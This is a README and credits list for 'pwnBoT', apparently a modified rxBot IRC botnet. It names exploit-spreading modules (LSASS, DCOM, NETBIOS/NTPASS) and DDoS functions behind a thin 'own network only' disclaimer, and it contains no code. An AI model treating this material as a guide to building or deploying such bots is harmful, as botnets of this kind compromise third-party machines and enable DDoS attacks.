pwnBoT is a modular irc bot based off of the code made by
the rBot dev team. rBot served as a great base to this bot
and matter of fact, the pwnBoT is still an RxBot, just a 
heavily modified one. This bot is **NOT** to be sold or
distributed as it is a **PRIVATE** modification. If you 
did not recieve this from SeminolePride himself, you must
have a leaked, and therefore crappy version of this bot.
Also, you get no support with leaked versions, if you do
everything the right way you'll get bot support. We the
CREATORS/AUTHORS/MODIFIERS, ARE NOT RESPONSIBLE FOR YOUR
ACTIONS WITH THIS BOT. WE WILL NOT TEACH YOU HOW TO DDoS
AND DONT EVEN ASK US HOW TO ADD STUFF TO THE BOT. THIS
BOT WAS NOT MADE TO DDoS OR EXPLOIT SERVERS, THE FUNC-
TIONS ARE SIMPLY THEIR TO TEST THE BOT ON **YOUR** OWN
NETWORK! IF YOU GET IN TROUBLE FOR USING THIS BOT IN AN
ILLEGAL FORM WE WILL NOT HELP YOU BECAUSE YOU HAVE SIMPLY
BEEN TOLD: 
**DO NOT USE THIS ON NETWORKS THAT ARENT YOURS**
**DO NOT USE THIS TO DDoS NETWORKS THAT ARENT YOURS** 

NOW READ BELOW FOR A FULL LIST OF MODS. ;)

  _____________________________________________________ 
 /_________.::[pwnBoT Mod List And Credits]::._________\
||                                                     ||
||------------- -----.::[CREDITS]::.-------------------||
||                                                     ||
||Authors:Nils, Racerx90, Edge-, D-oNe, HaRRo, TehRain ||
||Modders:CoKeHeAd & SeminolePride                     ||
||Origins: SDBot(rbot base), rxBot0.6.6d-stable(coke)  ||
||                                                     ||
||----------------.::[Modifications]::.----------------||
||                                                     ||
|| + STABLE VERSION               (CoKeHeAd)           ||                         
|| + Code Lightening              (SeminolePride)      ||
|| + Added LSASS                  (SeminolePride)      ||
|| + DCOM Update                  (SeminolePride)      ||
|| + Added Channel Commands       (SeminolePride)      ||
|| + Now goes by: pwnBoT          (SeminolePride)      ||
|| + Added Command List           (SeminolePride)      ||
|| + NETBIOS/NTPASS Update        (SeminolePride)      ||
|| + Changed the feel of the bot  (SeminolePride)      ||
||~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~||
|| + PRIVATE VERSION NOT TO BE LEAKED OR SOLD          ||
|| + IF YOU LEAK OR SELL THIS AND I FIGURE OUT THEIR   ||
|| + WILL BE NO UPDATES TO THIS BOT WHEN NEW EXPLOITS  ||
|| + COME OUT... WHICH MIGHT BE VERY SOON!             ||
|| + (SeminolePride)                                   ||
||                                                     ||
||_________________.::[EnD oF FiLe]::._________________||
 \_____________________________________________________/